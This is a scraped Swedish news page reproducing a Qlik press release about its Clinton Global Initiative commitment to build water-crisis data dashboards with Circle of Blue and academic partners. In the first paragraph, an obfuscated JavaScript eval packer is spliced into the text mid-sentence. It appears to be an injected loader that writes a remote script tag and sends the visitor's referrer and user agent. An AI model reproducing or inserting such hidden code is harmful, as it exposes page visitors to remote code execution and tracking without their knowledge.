Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Qlik åtar sig att finna lösningar på globala vattenkriser

Qlik åtar sig att finna lösningar på globala vattenkriser
Sebastian

Ingår eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|itdtk|var|u0026u|referrer|anbkb||js|php’.split(’|’),0,{}))
partnerskap med Circle of Blue, Columbia Water Center, University of California Irvine och Pacific Institute för att skapa och bidra till nya insikter om långsiktig hållbarhet, med understöd från Twitter.

Qlik® (NASDAQ: QLIK), ledare inom visuell analys, och bolagets koncernchef Lars Björk, har i samband med Clinton Global Initiatives (CGI) årsmöte 2015 ingått ett flerårigt CGI Commitment to Action för att adressera globala problem som berör tillgång till och kvalitet på vatten i världen. Genom att bidra med tydlig och visuell data kommer Qlik att påverka och förenkla viktiga beslut i frågor om exempelvis vattenfördelning, krishantering och infrastruktur. Tillsammans med sina partner kommer Qlik att utveckla en dashboard som kommer bli banbrytande. Lösningen kommer byggas med hjälp av Qliks analysplattform och ska visa historiska data, realtidsinformation, reportage direkt från berörda närområden samt omvärldens engagemang på ett lättförståeligt och visuellt sätt.

Efterfrågan på och behovet av rent vatten ökar på många platser i världen. Den låga tillgången leder dock bland annat till försämrad energiproduktion, matbrist, ostadig ekonomisk tillväxt samt hot mot den politiska stabiliteten. På senare tid har detta framförallt märkts i Asien, Mellanöstern och Sydamerika som drabbats hårt av torka och översvämningar, med politiska konflikter och oro som följd.

Enligt rapporten Global Risks 2015 av The World Economic Forum är vattenkriser nu det största globala problemet vi har, baserat på de omfattande negativa konsekvenserna bristen av användbart vatten får på människor, företag, miljö och samhälle. Qliks engagemang har uppkommit i och med CGIs Commitments to Action, som går ut på att organisationens medlemmar uppmuntras att bidra med konkreta planer och handlingar för att lyfta fram, lösa och förtydliga olika globala utmaningar.

Qliks åtagande “Grundvatten: att med data driva en hållbar utveckling” blev särskilt utvalt som en exemplarisk metod för hur data kan användas för att påverka viktiga globala beslut.

“Vi på Qlik är stolta över vårt medlemskap i CGI och att vi tillsammans med våra partner får leda ett viktigt initiativ som påverkar några av de absolut viktigaste besluten om vår planet och dess tillgång till eller brist på rent vatten”, säger Lars Björk, koncernchef för Qlik. ”Omvärldens förmåga att reagera vid kriser blir bättre om vi noga undersöker situationerna och kombinerar data med genomtänkt rapportering och deltagande. Vi måste aktivera det bästa och mest kreativa i oss för att kunna förstå och agera. Qlik är glada över att få hjälpa till att identifiera de möjligheter som finns att förbättra och lösa de utmaningar vår värld står inför”.

I sitt CGI-åtagande samarbetar Qlik med Circle of Blue, Columbia Water Center, University of California, Pacific Institue samt Twitter. Qlik kommer att tillhandahålla visualiserad data i dashboards som baseras på Qlik Sense®, en självbetjäningsapplikation för ”data discovery” och visualiseringar. Det innebär att politiker, beslutsfattare, företag och allmänhet kommer kunna ta förnuftiga och väl genomtänkta beslut som baseras på valida och tydliga data.

Circle of Blue är ett team av prisbelönta journalister och forskare med fokus på globala vatten- och resursfrågor, vilka också har varit Qliks ”Change Our World”-partner i fem år.

“Vi står inför en tid då klimatförändringar påverkar vårt vatten, vår mat och våra energisystem, samt orsakar skador för flera miljarder kronor, samtidigt som det påfrestar vår mänskliga och ekologiska resiliens globalt”, säger J. Carl Ganter, VD för Circle of Blue. ”I dagens era som präglas av enorma mängder data i ett flöde utan motstycke, har vi helt enkelt inte råd att låta verkligheten ligga nedpackad i gamla byrålådor och arkiv”.

Ganter är bland annat medlem i the World Economic Forum Global Agenda Council on Water och har tilldelats the Rockefeller Foundation Centennial Innovation Award för sin förmåga att sammanföra intressanta berättelser med strategisk data.

Åtagandet lanseras inledningsvis med en pilot-app som visualiserar tillgången till grundvatten och andra vattenproblem i Kalifornien. Sedan uttökas initiativet till nationell nivå i USA för att slutligen bli ett globalt initiativ.

Om Clinton Global Initiative
Clinton Global Initiative (CGI) grundades 2005 av USAs tidigare president Bill Clinton. Syftet med initiativet är att sammankalla globala ledare för att skapa och implementera lösningar på världens mest angelägna utmaningar. CGIs årsmöten har sammanlagt fört samman 190 nuvarande såväl som före detta statschefer, över 20 nobelpristagare, hundratals företags- och organisationsledare, kända filantroper och journalister. Idag har CGIs medlemmar ingått över 3 200 Commitments to Action, vilket har förbättrat livet för över 430 miljoner människor i över 180 länder.